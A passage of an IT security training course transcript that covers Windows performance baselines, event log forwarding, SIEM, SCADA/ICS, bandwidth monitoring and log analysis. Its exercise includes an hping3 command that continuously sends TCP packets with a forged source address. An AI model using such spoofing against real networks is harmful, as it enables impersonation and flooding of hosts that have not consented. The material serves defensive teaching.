Finish, and Cancel.] Maybe I'll call this Establish Baseline, because what I could do is gather performance
metrics over time on this particular host, although it could be counters from remote hosts over the network. So
I'm going to choose Create manually here, and I'll click Next. [The next page of the wizard contains two radio
buttons, Create data logs and Performance Counter Alert. The Create data logs radio button has three
checkboxes listed under it, namely Performance counter, Event trace data, and System configuration
information.] And what I want to do here is work with performance counters, so I'll turn on the check box for
performance counter, and I'll click Next. [The next page of the wizard includes a Performance counters field
and two buttons, Add and Remove. It also has a spin box for Sample interval and a drop-down list box for
Units.] Then I click Add to choose the specific performance counters from the local, or even remote
computers. [The add counters dialog box opens.] So we have options related for that, so I'm going to scroll
down to, again, the P, physical disk section. And just for consistency, maybe we'll choose the average disk
queue length here, and I'll add it for all instances, I'll click Add, and OK. And I'm going to have that sampled,
let's say every 15 minutes, and I'll click Next, I'll accept the defaults. And on the last screen, though, what I do
want to do is open up the properties for the data collector set. So I have to turn that option on, and then I'll
click Finish. [The wizard closes and the EST Baseline Properties dialog box opens. It includes various tabs
such as General, Security, and Schedule.] I want that option because here I can go to the Schedule tab, where I
can add a schedule, [He clicks the Add button at the bottom of the Schedule tab. A Folder Action dialog box
opens.] in terms of when I want this data collector set to begin gathering information, on which days of the
week and so on.
So maybe I'll have it start, let's see here, on the following Monday, September 19th. And I'll have it expire,
maybe, at the end of that week, September 23rd. So I have five business days worth of working data, and then
I'll click OK. [The dialog box closes.] So then I'll be able to see reports down here, [He expands the reports
folder in the navigation pane.] for example, for user defined items like Establish Baseline, over time, once it's
gathered that information and the schedule has kicked in. Now of course, aside from Performance Monitor,
which I'll close, we can also go into the good old Task Manager. So, one of the ways I can do that, of course, is
to search for it. So I'm going to search for Task Manager here in my Start menu, I'm going to launch that
tool. [The Task Manager window opens. Running along the top is a menu bar with three menus, File, Options,
and View. Below that are various tabs such as Process and Performance. The Process tab is selected by
Default. It lists various running processes in a tabular format. The table headers are Name, Status, CPU, and
Memory.]
Task Manager in server 2012 R2 will give us a list of running processes. Of course we can sort them by
name, [He clicks the Name table header. The processes are now alphabetically grouped under two sections,
Apps and Background processes.] or they're grouped by default as well. We can turn that on, because if we go
under View menu, we can see that it's grouped by type. So the apps are grouped together, our background
processes are listed grouped together. Of course we could sort by CPU utilization or memory utilization if the
system is sluggish and we suspect it's due to a single running process, for instance. Under the Performance
tab, [He clicks the Performance tab. It includes four radio buttons: CPU, Memory, Ethernet, and
Ethernet.] we can see the CPU graphed information for all cores on this host. We could also click on Memory
here to view our memory utilization on a graph, to see how much memory is in use out of our total available
memory. We could click on Ethernet to view information about our Ethernet traffic. So, we've got various
Ethernet adaptors here, so that's why I've got multiple occurrences here of Ethernet on the left-hand side.
You'll see when I select the first one, I get the IP address information listed, which is going to be different
from my second instance of an Ethernet interface. [He closes the Task Manager window.] We could also go to
the Windows Start menu and search up reliability. The Reliability history tool is interesting because it gets its
data from the Windows Event Viewer logs. [He clicks the View reliability History option from the search. The
Reliability Monitor window opens. It displays a stability index graph for each day and details of the events
below it. These details are listed in a tabular format. The table headers are Source, Summary, Date, and
Action.] And what it will do is it will chart a stability index, which is this blue graphed line across the top.
Whenever there's a problem, and we can see we've got a couple of problems here, of course they're aligned
with our dates at the bottom and they are red circles with white X's. Whenever there's a problem, notice the
overall stability line index dips down, because the system isn't as stable any longer. So I can click right on one
of those problems down below and see what the issue was. So I've got an instance here of Windows not being
properly shut down on September 5th on a certain time. And I can see that well, that caused the instability
index graph to go down. And then I've got other issues here which I could click on. Of course over time, as we
no longer have problems, notice that the line keeps going up. So this is another valid monitoring tool overall.
And it is based on the gathered log information on the Windows host, that gives up a quick picture of how the
system is doing overall, in terms of health. In this video, we took a look at Windows OS monitoring tools.
[Topic: Windows Event Log Forwarding. The presenter is Dan Lachance.] In this video I'll demonstrate how
to configure Windows Event Log Forwarding. Here in Windows 7, I'm going to configure it such that a
Windows server can reach out periodically. And grab specific log events from this host and have it stored on
itself. That way we can have centralized logging. The first thing I'll do here in Windows 7 is I'm just going to
go ahead and go to the command prompt, and I'm going to type winrm qc for quick config. The WinRM
underlying service which uses an HTTP transport is actually what's used to deliver these log messages over the
network. So here it's telling me it's going to create a WinRM listener. And it's going to make sure that the
service is running and that there's a firewall exception. So I'll press Y to accept that those changes will be
made. And it's been done. Now of course, you could use group policy in an Active Directory environment to
enable WinRM on multiple machines. But this is how you do it on a single machine. [Dan closes the command
prompt window.] The other thing we have to bear in mind and again, you might configure this centrally
through other tools like group policy. Is that the server that's going to reach out over the network into this
machine. Or any machine to grab log information needs to have certain privileges. So I'm going to go ahead on
this machine and right click on Computer in the Start menu. It's running Windows 7 and I'm going to choose
Manage. [The Computer Management window opens.]
Where on the left, [in the navigation pane,] I'm going to go under Local Users and Groups and click Groups.
There's an Event Log Readers group, so I'm going to double click on that to open it up. [The Event Log Reader
Properties dialog box opens.] And I want to click Add because I want to add my server as a member. [The
Select Users, Computers, Service Accounts, or Groups dialog box opens.] So what I'm going to do then is
click the object types, and I'll deselect Service Accounts, Groups, and Users. Because I know I only want to
look at computers, so I'll turn a check mark on for that. I'll click OK. The location is my domain name here,
quick24x7.com, that's an Active Directory domain. So I'll click the Advance button, then I'll click Find Now to
list computers in the domain. The server that will be configured as a centralized logging collector host is my
domain controller DC001. So I'm going to select that from the list. I'll click OK and OK. So that takes care of
what needs to be done here if you will on the client side. Let's switch over to the server and see what needs to
be done there. On my Windows server I'm going to go ahead and go to the Start menu. And what I want to do
here is start by opening up the event log viewer tool. So I'm going to go ahead and choose Event Viewer. Once
that pops up, the idea here is that I want to make sure I have a configuration which is called a
Subscription. [The Event Viewer window opens.] That will require this server to periodically go out and get
information from specified hosts, specific log information and bring it back here. So I'm going to go ahead and
expand or maximize the Event Viewer window. And if I were to expand for example Windows Logs [from the
navigation pane,] we see that there's a default Forwarded Events view, [He clicks the Forwarded Events
option from the navigation pane. There are no forwarded events listed currently.] which is designed to hold
items forwarded from other machines.
We could change that but that's what I'm going to stick with. So I'm going to go ahead and click Subscriptions
over here on the left. [An Event Viewer message box opens.] It tells me on my server that if I want to work
with these subscriptions for log forwarding the Windows Event Collector service must be running. So I'm
going to click Yes, to make that happen. Then I'll right-click on Subscriptions in the left hand panel, and I'll
choose Create Subscription. [The Subscription Properties dialog box opens. It includes fields for Subscription
name and Description. Below that is the Destination log drop-down list box. Below that is the Subscription
type and source computers section that has two radio buttons, Collect initiated and Source computer initiated.
The Collect initiated radio button is selected by default. It has a Select Computers button beside it. Below the
section is a Select Events button to select Events to collect and an Advanced button to configure advanced
settings. There is an Ok and Cancel button at the bottom of the dialog box.] Here I'm going to call it Collect
Problems. Because essentially I'm going to be collecting only critical errors, that type of thing from machines.
The destination log here is set to forwarded events which we can see over here on the left. Collector initiated is
what I want. The server is the collector. It will initiate a connection out to machines that I specify, which I do
here by clicking the Select Computers button. [The Computers dialog box opens. It includes a Computers field
and buttons such as Add Domain Computers, Remove, and Test.] So I'm going to click Add Domain
Computers. [The Select Computer dialog box opens. It includes fields such as Select this object type and From
this location. It also includes various buttons such as Advanced and OK.] And I'm going to go ahead and click
Advanced > Find Now. [The dialog box expands to show various search results.] And I'm going to choose our
Windows 7 domain joined computer. And I'll click OK. [The Select Computer dialog box closes and the
screen goes back to the Computers dialog box.] Now, notice that you can select a computer added here. And
click the test button on the right to make sure it can be reached properly over WinRM. [An Event Viewer
message box opens which has the following message: Connectivity test succeeded.] So the connectivity then is
in place. So I'm going to go ahead and click OK. [The screen goes back to the Subscription Properties dialog
box.] But we haven't yet told it what type of log entries that we're interested in. So down below, I'm going to
click the Select Events button. [The Query Filter dialog box opens.] And here I'm going to tell it I only want
Critical, Warning, and Error items from, and here I can choose of course, the specific Windows Logs. Maybe
I'll choose the System log for those hosts or that host. In this case it's only one. You can also select multiple
logs from this list. So here we're looking for critical warning and errors from the application security and
system logs. Now after a few minutes, [He closes both the dialog boxes to go back to the Event Viewer
window.] if you go ahead and look at forwarded events. Then you're going to start to see some of these items
where really if you select one of these items in Forwarded Events, you're going to see where it came from.
You'll see the computer listed here and you'll also see the log. Here we've got, for example, the System log.
And as we scroll down we'll see other items that might have come from different logs such as the Application
log and so on. So maybe way down here we can start seeing that yes, indeed we are getting these events
forwarded from our Windows 7 station to this server from different logs. In this video, we learned how to
configure Windows Event Log Forwarding.
[Topic: SIEM. The presenter is Dan Lachance.] In this video, I'll talk about SIEM. SIEM stands for Security
Information and Event Management. It's an enterprise class monitoring and remediation tool. So it allows us to
view security-related events in real time, and it also allows us to view that data from a single point of view.
Pictured in the diagram, we can see that our SIEM solution can gather data from many sources including
servers, switches, routers. Even PLCs in more industrial environments. The SIEM solution, through its
monitoring and storage of data, can help identify trends and patterns over time.
But it can also be used to detect events that are out of the ordinary. A SIEM solution is usually one or more
virtual appliances that technicians connect to using a web browser interface. And the technician might then
work with a dashboard that has charts and graphs and certain warnings. And, for instance, a pie chart might
even have multiple slices that each indicate the number of occurrences of certain types of incidents on a single
network device. So there are many great benefits to using SIEM, especially in a larger environment. SIEM
solutions often are a combination of security information management as well as security event management.
So we can detect some kind of events that look suspicious, but we can also take gathered security information,
such as standard log file information, and identify patterns over time. And as our networks keep growing and
growing because we keep adding things like smart phones and laptops and so on, often we'll need a centralized
tool that can do just that. To monitor security information and to also be able to manage events as they occur.
The SIEM solution will collect data into a central repository. SIEM solutions always use some kind of a back-
end database to store this data. Naturally, depending on the amount of data that needs to be processed and
stored and analyzed, will determine how many virtual appliances you need that do SIEM analytics. So we
might collect, for example, log files from different devices. Whether they're intrusion prevention system
devices, server operating systems.
Or it could even include vulnerability scanners and so on. Now because those file formats for log files might
differ from platform to platform, a SIEM solution has to be able to accommodate various file formats. Also,
with SIEM solutions, they're designed to have the ability to quickly look at large data sets to search for
something that is relevant. So, for example, if we're looking at PCI DSS compliance for companies that work
with cardholder data, we might need to quickly identify user accounts that have been inactive for a period of
time. Because they need to be disabled in order to adhere to PCI DSS compliance. SIEM can use multiple
collection agents that can run on network devices and report back to the centralized SIEM virtual appliance.
There's a hierarchy in the sense that all of the gathered data on the client is sent back up to a centralized host
where reporting takes place. Now you might even have a hierarchy that has multiple levels of SIEM hosts,
where in the end, all of the reporting data is sent back up the hierarchy to a single SIEM instance. So we can
gather information from many locations, like end user devices. Now, naturally, that would include log files for
things like operating systems on smartphones and laptops, but also even events that occurred, like when a user
plugged in a USB thumb drive on a laptop. That would be gathered by a SIEM agent and sent back to the
SIEM appliance. And it will be dealt with from there. Information can also be gathered from servers, various
types of network devices, like routers and switches, firewalls, and intrusion detection systems. So, the idea is,
we might even have our SIEM system with an agent on a database server that is configured to detect an abuse
of privileges within that database application. SIEM systems are either rule-based, where we configure rules to
tweak them for our specific environment, or they could be statistical correction engine-based, where there's
correlation that takes place. For instance, if it sees that there are way too many packets coming from a single IP
address within a short period of time, it might report that as abnormal activity. The best SIEM solutions
actually contain both of these options. Considerations for SIEM solutions include facts such as that the
installation could be complex, especially on a larger scale where we need to deploy collection agents on many
different types of devices. It can also be complex to administer when it comes to building a rule set that is
specific to your environment. And in some cases, they can be expensive. However, it might be well worth the
cost if we need to run a SIEM system to pass some kind of compliance audit, such as PCI DSS. In this video,
we talked about SIEM.
7. Video: SCADA and ICS (it_cscybs_13_enus_07)
In this video, you will identify where SCADA and ICS are used in different industries.
Objectives
[Topic: SCADA and ICS. The presenter is Dan Lachance.] In this video I'll talk about SCADA and I'll talk
about ICS. SCADA stands for supervisory control and data acquisition. It's a remote hardware monitoring
solution that most of us won't be using on our local area networks. It tends to be used, more often than not, in
scientific environments, in various industrial environments, medical, manufacturing. Or even to control and
monitor heating, ventilation and air-conditioning or HVAC systems. SCADA components include sensors of
different types. Such as physical equipment parts or to watch for water pressure changes or to check the state
of valves or motors. Gathered sensor data is then sent to hardware controller units. Now from there, the data is
then forwarded to the SCADA software where it's stored in a database for analysis and reporting.
And this is where SIEM kicks in, security, information and event management. ICS stands for industrial
control system. SCADA is actually a type of ICS. ICSs are used often in places such as oil refineries,
manufacturing plants, water treatment plants, power generation facilities, recycling facilities, and waste
management facilities, just to name a few. In 2010, the Stuxnet worm targeted industrial control systems, or
ICSs. Specifically, it affected centrifuges for uranium enrichment at plants in Iran. So this is a great example of
malware that can actually have a major impact in the physical world. In this video we discussed SCADA and
ICS.
[Topic: Monitoring Network Bandwidth. The presenter is Dan Lachance.] In this video, I'll discuss Network
Bandwidth Monitoring. By capturing network traffic over time and analyzing it, we can understand what the
normal network data flows are on a specific network. And this can be really useful if you want to set up a
baseline of normal activity that might be used for comparison of current activity with things like intrusion
detection and prevention systems out on the network. The placement of the tool, whether it be hardware or
software, that we're using to monitor the network is always crucial. So for example if we want to monitor
network utilization on a specific VLAN, then our device whether it's hardware or software, should be placed
on that VLAN. Traffic shaping allows us to determine how the network is utilized to meet our network needs.
For example we might throttle bandwidth so that activity to and from certain servers is preferred. So if there's
more bandwidth available in other words than for other servers that don't have as much network activity.
Bandwidth monitoring is also crucial for network capacity planning, where we can determine not only what's
permanently happening on the network but any potential future needs for more bandwidth. We can also at the
same time prevent unnecessary spending, because what we might do is determine that the network is being
utilized in such a way that it's not be used efficiently. So instead of spending more for more bandwidth we
might better utilize what we already have. Examples of things that we might learn by monitoring networks
include detecting things like denial of service attacks or distributed denial of service attacks, DDoSes. We can
also determine if we should be prioritizing traffic using quality of service or QoS. For instance, voice over IP
traffic might have a higher priority being sent over the network because it's time critical, versus HTTP or
SMTP traffic. Our tool of choice might also easily identify chatty hosts on the network.
And this might even lead us to the fact that perhaps we've got an infected host that is sending and transmitting
more traffic than is normal on the network. Common network bandwidth monitoring tools include tools such
as Netflow Analyzer, Multi Router Traffic Grapher, MRTG, and BitMeter OS. Let's take a moment and view
what the Netflow Analyzer looks like. A picture paints a thousand words, [The screen switches to
oriondemo.solarwinds.com website. It displays analyzed data such as Top 10 Endpoints and Top 10
Applications in the form of pie charts.] so many of these network monitoring tools will allow us to view things
in graph format. For example, here I've got a pie chart that displays the Top 10 Endpoints. Of course I can
hover over any one of the items within the pie, in other words the slices of the pie chart, to get details about the
host or the ingress or inbound bytes or egress or outbound bytes from that host. As well as the ingress and
egress packets as we can see here. Now as I scroll down below things like those charts, for example for the
Top 10 Endpoints, I can see the host names. So it's telling me the Top 10 Endpoints in terms of host names. I
can also see over on the right I've got a pie chart for the Top 10 Applications. And overwhelmingly, if we
scroll down a bit, we can see it's HTTP.
World Wide Web traffic, that's the big blue part of this pie slice here. Now that would be much more difficult
to determine by using a standard packet capturing tool like Wireshark. So when we have other tools on the
network that are designed for that purpose, we can very quickly determine how the network is being used. As
we scroll through our interface, we can also see the NetFlow Sources here. So I can see the specific routers and
interfaces that are available, that we're gathering information from. And as we go down, for instance if I were
to hover over a specific routing device. Then I can get information about that by clicking the link, or I can
hover over it to get a couple of quick details, like the CPU load on that router. But I can even drill down to the
interface on a router. So for example, if I select or simply hover over the link for an interface on a router, I can
see some statistical information, including the current traffic, how utilized it is in terms of transmitting and
receiving, and so on. I can also scroll down and take a look at the top five conversations between hosts on the
network. So again this big blue part of this pie chart lists the two host names that are involved in the most
utilization on the network. So clearly using this type of tool really sheds a lot of light on how the network is
being used and how we might even better utilize it. Or in some cases we might even determine that there's
something suspicious happening on the network. In this video we took a look at how to monitor network
bandwidth.
9. Video: Point-in-time Data Analysis (it_cscybs_13_enus_09)
In this video, you will learn how to analyze timestamped data from various sources.
Objectives
[Topic: Point-in-time Data Analysis. The presenter is Dan Lachance.] When analyzing data, it's always
important that we have a trusted time source. In this video, we'll talk about Point-in-time Data Analysis. IT
system administrators will often need to legitimately analyze data resulting from activity on the network as a
whole, individual hosts, applications running on hosts, and that data often comes from logs. However, on the
malicious user side, the same type of activity might be used for reconnaissance. So, it could be the
unauthorized analysis of networks, hosts, applications, and related logs. And is this is one of the reasons why
we want to ensure that systems that are publicly visible in some way are assumed to be compromisable. So,
therefore, we might configure log forwarding to have a copy of the logging events stored elsewhere, because if
they're compromised so are their log files. A security information and event management system or SIEM has
numerous correlation engine add-ins or plugins to give it additional capabilities. Some of these plugins allow
the related data to be used to identify and score threats so we can start prioritizing which threats are more
prevalent than others based on gathered information from devices on the network. However, a science system
requires specific rule configuration for a specific environment.
For instance, a rule needs to identify what the most valuable assets are in order for scoring of threats to work
properly, that requires configuration. Because one valuable type of asset in one organization might differ from
another different organization. Another way that we can use data for Point-in-time Data Analysis is by using
backups. Backups are taken at a certain point in time and reflect the state of data or even operating system files
at that point in time. And in some cases when there is evidence gathering for forensic analysis purposes, this
can be very important. It's always going to be important to make sure that there is a trusted, or there was a
trusted, time source when something occurred, such as a backup or even a snapshot of the file system or a
virtual machine. But then also, when gathering evidence for digital forensic analysis, it's always important to
make sure that we work only on copies of data, and never on the original data.
The original data needs to be hashed, so we have a way to detect if anything has been altered since that data
was acquired. Point-in-time data analytics can also perform detailed log analysis from Windows or UNIX and
Linux environments from their respective log sources. Log forwarding should always be going to a centralized
logging host. So from here we have one place that we either manually view or have configured some kind of a
trigger to notify us when some kind of log event occurs. Now instead of configuring that, for example, for 500
devices on a network, we could have 499 of those devices forward log entries to one logging host. Now, of
course, we would have a duplicate logging host for fault tolerance but the idea is that we've got a single point
of reference for a multitude of log entries from different devices. So for Windows, we can enable Windows
Event Log subscriptions to make that happen. In the UNIX and Linux world it requires configuration of the
syslogd daemon. We can also use the results from different types of reports or activities to perform point time
data analysis.
Consider the fact that when a penetration test is run, the results are given to the owners of the network or the
host or the application. Also, if full network and security audits are conducted, then the audit findings can be
used as results that we might analyze to determine what vulnerabilities exist and what we can do about them.
Also vulnerability assessments, of course, are different than penetration tests because all vulnerability
assessments do is identify the vulnerabilities, whereas a penetration test will actively try to exploit them. But in
the end, either way, we'll know, first of all, what vulnerabilities exist and in the case of a penetration test, we'll
actually know, we'll have a proof of concept mechanism of knowing actually how exploitable those
vulnerabilities really are. Data loss prevention or DLP systems can also prove as a rich source of data for
point-in-time data analysis. Now, DLP systems are used to ensure that sensitive data doesn't get into the wrong
hands. So, for instance, it might prevent the sending of a sensitive file through a file attachment in email to
people outside of the company. In this video, we talked about point-in-time data analysis.
[Topic: Data Correlation and Analytics. The presenter is Dan Lachance.] In this video, we'll have a
discussion about data correlation and analytics. One aspect of securing the enterprise is to monitor IT systems
and their resultant data. And there are plenty of tools that can do that in various ways. It's also important not
just to gather that type of data, but to analyze monitoring data to try to extract meaning from what we've got.
Now analysis could be historical, where we want to identify trends over time. So we might want to aggregate
data from different sources taken over time and we might even want to correlate it with current data. So real-
time data can also be used, and that's really useful when we need to identify suspicious activity that could
indicate that there's some kind of an exploit being taken advantage of. Of course, when we secure the
enterprise and look at all this monitoring data, we need an efficient way to run reports on only the extracted
relevant data.
There are also data retention laws and regulations that could apply to an organization that determine how long
data gets stored. In order for data correlation and analytics to provide relevant information, our network device
inventory needs to be up-to-date. Now we can't manually run around and write down what we have on a large
scale. Instead, we should use a centralized automated solution such as Microsoft's System Center
Configuration Manager, otherwise known as SCCM. There are other tools from other vendors, including
Altiris and Spiceworks. Either way, we need a way to track what is on the network. In this day and age, there's
lots of talk about big data. Well, one aspect of that, that can become complex, is the analysis of big data. So we
need to have a solution that is scalable if we're going to be monitoring information on a large network or on
multiple networks with thousands of devices. Now one of the things we could use is a cloud-based service
where we could spin it up as we need to do the analysis, and then spin it down when we no longer need it. That
way we're not paying for it when it's not in use.
So an example of this would be Amazon Web Services Elastic MapReduce tool. So essentially, we've got a
cluster of devices processing very large data sets so that we can extract only useful information. Now big data
analytics can also involve real-time analysis of network traffic, which gets a little more complex if we want to
analyze it as it's happening. Deep packet inspection is possible, where we look further beyond the packet than
its headers. Instead, we're looking down into the payload or the data portion of the packet to determine what's
happening or if there's something suspicious happening. Large volumes of device-monitoring data sets will be
able to benefit from the fact that we might have a cluster of machines working together to analyze the data,
such as is the case with Elastic MapReduce. We also have to consider the fact that big data analysis might
require correlation of differing data sources. So depending on the solution that we use for big data analytics,
we might be able to accommodate different types of data sources, or one system might have to export it in a
certain format so it's in a consumable form by another big data analytics solution. When we talk about big data,
we have to consider how much storage space will be required, especially if we've got retention requirements
where we've got to keep data hanging around for a long period of time. So we always have to think about the
current amount of required space, but also we need to think about future growth and capacity planning to make
sure we don't run out of space. And that's one case where the cloud comes in useful, where we can rapidly
provision additional disk space as it's needed. We should also consider the use of data duplication.
In this way, we're only storing one copy of unique disk blocks, and in the end we're conserving disk space.
Data correlation and analytics becomes extremely useful when we generate useful reports. As they say, a
picture paints a thousand words. So if we have reports that can be generated in some kind of graph format, then
people that are decision makers can quickly ascertain by looking at the graph what's happening and then make
a decision based upon it. However, for that to work properly, the reporting data must be trustworthy. Also, the
data must be current if we're looking at making new decisions based on that data. We can also integrate our
data correlation and analytics solution with intrusion detection and prevention policies to identify anomalies.
So essentially, we are reusing existing configurations since there is some overlap in what the possibilities are
in terms of detecting anomalies. Another aspect is to make sure that we configure our solutions such that it will
filter out false positives. A false positive is some kind of event that gets triggered where it may look, for
example, on the security side, as some kind of suspicious activity when, in fact, it's benign and normal activity.
And this is one of the reasons why many of these security solutions need to be tweaked. They need to have
very specially crafted rules that are specific to an environment. Data correlation and analytics also has the
benefit of being able to determine some kind of a response to discovered security incidents. In this video, we
discussed data correlation and analytics.
[Topic: Detailed Log Analysis. The presenter is Dan Lachance.] In this video, we'll discuss how to do a
Detailed Log Analysis. A Detailed Log Analysis lets you distinguish the noise from the various log sources
from the actual relevant data that you're looking for. An event is an occurrence on the network or on a host. So,
in our context, we're really talking about an event being written into a log file. But an event might also be
related to an email message, or a help desk system, and so on. Incident responders can look at log information
and make a decision as to whether or not a certain issue needs to be escalated. It might need to be escalated
because it's outside of the scope of authority of the current technician. Or, it could be beyond their skill set.
When we configure detailed log analysis settings, there are things that are common, regardless of the tool we're
using. Such as the configuration in the Windows environment of event log settings, like how big the log can
grow, where it's stored, and whether it's archived. The same thing is true in the Linux world, whether we use
log rotation. Also, we have the option of determining whether or not we want to configure log forwarding to
other hosts so that we have a centralized way to view all logs on a large scale. Incident response actions can
also be based on data found within log files. So, because this could also be used to make important decisions,
we want to make sure that our log data is trustworthy by securing it. Whether that means encrypting it or
forwarding it to other centrally and hardened logging hosts. Here in the Windows Event Viewer, I've already
opened up the Windows System log on my server. If I right-click on that log, System, in the left-hand
navigator, then I can choose Properties. [The Log Properties dialog box opens.] And from here, I can see
things like the current size of the log and when it was created and modified or accessed.
But down below, we'll find the configurable items, such as what we want to set the maximum log file size to
be, and the unit of measurement is kilobytes. And whether we want to archive logs or simply overwrite events
as needed and so on. Now at the same time, we can also do this kind of work in PowerShell. [Dan opens the
Administrator Windows Power Shell terminal. It lists the output of the following cmdlet: get-eventlog security
-newest 5.] And sometimes if you want to automate something, it might be easier. Here we've already issued
the get-eventlog cmdlet. We've told it we want to look at the Windows security log on this host. And we've
asked for the newest five entries. So by doing this, we now have a way to capture this information and
manipulate it. And therefore, automate any massaging of the data that might be required before yielding useful
results. In the Linux environment, [The screen switches to root@kali:~ command prompt window.] if we
change directory to /var/log and type ls, we'll see a number of log files. And the blue entries are actually
subdirectories that contain other log files. So, for instance, here I see a file called auth.log for authentication.
So if I use the cat command to display the contents of auth.log and pipe that to more to stop after the first
screenfull. [He executes the following command: cat auth.log | more.] We can see we have a series of log
entries here related to sessions being opened and closed for various users, and so on. Now of course, in
Windows, we can right-click on a log and search through it or find something specific. Here in Linux, what we
might do is, use the cat command against the login, pipe it to the grep line filtering tool.
So, for example, if I want to look for something related to the word password, [He executes the following
command: cat auth.log | grep password.] I could filter it using grep. And now I'm only seeing items from
auth.log related to the search text, password. Another way to comb through log files, either manually or in an
automated fashion, might be to use some kind of a log analysis tool. [The screen switches to the splunk light
tool window. It includes a navigation bar at the top that has four tabs, Search, Reports, Alerts, and
Dashboards. The Search tab is selected by default. The page includes a What to Search section, which has
three tabs: Hosts, Sources, and Sourcetype.] Such as in this case, the Splunk Light tool, where I've already
gone and added a couple of log sources here. [He clicks the Sources tab to list the added sources.] I've got a
SCCM discovery log file, as well as a couple of Linux log files. Now, if I were to click on any of these, for
example, I'll click on the Linux daemon.log file here, then I can see it's opened up the log file. [The page has
four tabs: Events, Patterns, Statistics, and Visualization. The Events tab is selected by default and it displays
various log events by time.] And it's giving me the entries in an easy to read format. Much easier than it
appears at the command line on a Linux host, at least. And interestingly, a lot of these log analysis tools will
let you discern patterns. [He clicks the Patterns tab.] So here, it's telling me there's a 4.11% occurrence of this
specific log event, where it's activating a specific service. Also, we'll have the option in log analysis tools to
run reports of various kinds. And we'll even be able to configure alert notifications so that we get alerted when
certain things happen. We can also build our own custom dashboards that will show us information that is
relevant, based on what it is that we want to see. So there are various ways then to comb through log files.
Depending on your requirements, continuous log monitoring might be required so that you can respond in a
timely fashion to any anomalies that are detected.
Now when abnormalities are detected, this is only possible because we already have a baseline of normal
activity or log events. Many vendor solutions do have generic databases of abnormalities or known suspicious
behavior. But to really have this work properly in your environment, it needs to be tweaked for your
environment. You need a baseline of normal activity. That could be at the network level, the host level, but
often, it's at an application specific level. We can also use log filtering to filter out the noise from log files. We
could also use the search capabilities. And this can be automated, as we saw, for instance, using PowerShell.
We should also always audit log access so we know who has had access to logs at different times and what
they did. Example log items that would certainly warrant our attention include things like invalid user
messages, failed password, unknown host, invalid key, and so on. Of course, any missing date or time spans
within a log are suspicious because it indicates that perhaps the machine or the device was compromised. And
the attacker cleaned their tracks by wiping some log entries. In this video, we talked about doing a Detailed
Log Analysis.
Upon completion of this video, you will be able to describe the difference between vulnerabilities and exploits
as well as use various reporting tools.
Objectives
describe the difference between vulnerabilities and exploits as well as use various reporting tools
Exercise Overview
[Topic: Exercise: Understand Exploits and Monitoring. The presenter is Dan Lachance.] In this exercise, you
will discuss personnel management best practices. Followed by distinguishing the difference between a threat,
vulnerability, and an exploit. Then you'll configure Windows log forwarding to a centralized host. You will
filter Windows log events to view only critical events. And finally you'll use Linux to create a forged TCP
packet. At this point, pause the video and perform each of these steps to the best of your abilities then come
back here to see the solutions.
Solution
Personnel management includes many best practices, such as thorough background checks to ensure that
individuals that will be hired are trustworthy and don't have a criminal background. We should also use
separation of duties. So, no single employee can control an entire business process from beginning to end. This
way, we can reduce fraud because more people are involved within the process. Mandatory vacations ensure
that when someone fills in an employee's position while they're on vacation, they'll be able to noticed any
anomalies or discrepancies beyond the norm. Cross-training can be important. So that, we've got more than
one person that has a specific capability or skill set in the company. A threat is a perceived negative impact
against an asset while a vulnerability is some kind of a weakness. And it may or may not be known to the
system owner or vendor, in which case, if it's not known to them, it's called a zero day. The exploit actually
takes advantage of a vulnerability. To configure Windows log forwarding on all the quote unquote client
devices whose log information will be sent, if you will, to a centralized logging host. We need to make sure
that that logging host's computer account has the ability to read logs. So here, for example, on a client system,
I'm going to go and right click on Computer from the start menu.
This is a Windows 7 station, and I'll choose Manage. [The Computer Management window opens.] I need to
get to my local groups. [Dan expands the Local Users and Groups node from the navigation pane and selects
the Groups folder.] So what I want to do is open up the Event Log Readers group. [The Event Log Readers
Properties window opens.] And make sure that the appropriate computer account that must have access to read
log entries on this host is listed. [He clicks the Add button at the bottom of the dialog box. The Select Users,
Computers, Service Accounts, or Groups dialog box opens. He clicks the Object Types button. The Object
Types dialog box opens, and he selects the Computers checkbox. He clicks Ok to close the Object Types dialog
box.] So here I'm just going to go ahead and put in the name of my server and verify the name, and I'll click
OK. [The dialog box closes. He closes the Computer Management window.] So the next thing to do is to
configure a subscription on the server itself. On the server, in the Event Viewer tool, [The screen switches to
the Event Viewer window.] we would right-click on Subscriptions in the left hand panel. And we would create
a new subscription. [The Subscription Properties dialog box opens.] When we do that, I'm going to call it
Sub1 for subscription one. It's going to be collector initiated, this server will collect log events that we specify,
but I have to select the computers here. [He clicks the Select Computers button. The Computers Dialog box
opens.] So I'm going to go ahead and add domain computers here. [He clicks the Add Domain Computers
button. The Select Computers dialog box opens.] So, here's one computer. [He adds the win7 computer and
clicks OK. The Select Computers dialog box closes.] I'll make sure that I've got the connectivity over WINRM
required. [He clicks the Test button in the Computers dialog box. The Event Viewer message box
opens.] Otherwise WINRM would have to be configured on the client device. [He closes the dialog boxes and
goes back to the Subscription Properties dialog box.] So, I'm going to go ahead now and click on the Select
Events [The Query Filter dialog box opens.] where I can choose for instance what I want to view. Now, in our
exercise instructions we were asked to make sure that we have log forwarding to a centralized host. Didn't
specify what type of event level. So here I'll just choose Critical, Error, and Warning, specifically let's say from
the Windows Application log, then I'll click OK. [He closes the dialog boxes and goes back to the Event
Viewer window.] Now the result is that those events should then show up here under Forwarded Events. So, I
have one centralized place to view events from other machines over the network.
And we could repeat this in terms of configuring the Event Log Readers group which we did initially on other
computers. In the final part of the exercise we were asked to use Linux to create a forged TCP packet. [The
screen switches to root@kali:~ command prompt. It displays the following command: hping3 192.168.1.1 --
spoof 172.16.1.19 --destport 25.] Well, we can do that using Kali Linux with the built in hping3 command
where I'm going to target a host at 192.168.1.1. I'm using --spoof so I want to spoof the packet. It's going to
look like a came from 172.16.1.19 and I'm sending the destination port to be for SMTP mail or 25. So as soon
as I press Enter I am continuously sending out that traffic to 192.168.1.1 where I've spoofed the contents of
that transmission. Hping3 has other parameters to further spoof other details.
Session & Risk Management
A structured approach to security allows for the efficient management of security controls. In this 13-video
course, you will explore assets, threats, vulnerabilities, risk management, user security and session
management, data confidentiality, and encryption. Key concepts covered in this course include how to identify,
assess, and prioritize risks; how to implement security controls to mitigate risk; and learning about account
management actions that secure the environment. Next, learn how to use Group Policy to implement user
account hardening and configure the appropriate password security settings for those accounts in accordance
with organizational security policies; learn how HTTP session management can affect security; and observe
how to harden web browsers and servers to use TLS (transport layer security). Then learn how centralized
mobile device control can secure the environment; learn encryption techniques used to protect data; and
observe how to configure a virtual private network (VPN) to protect data in motion. Finally, learn how to
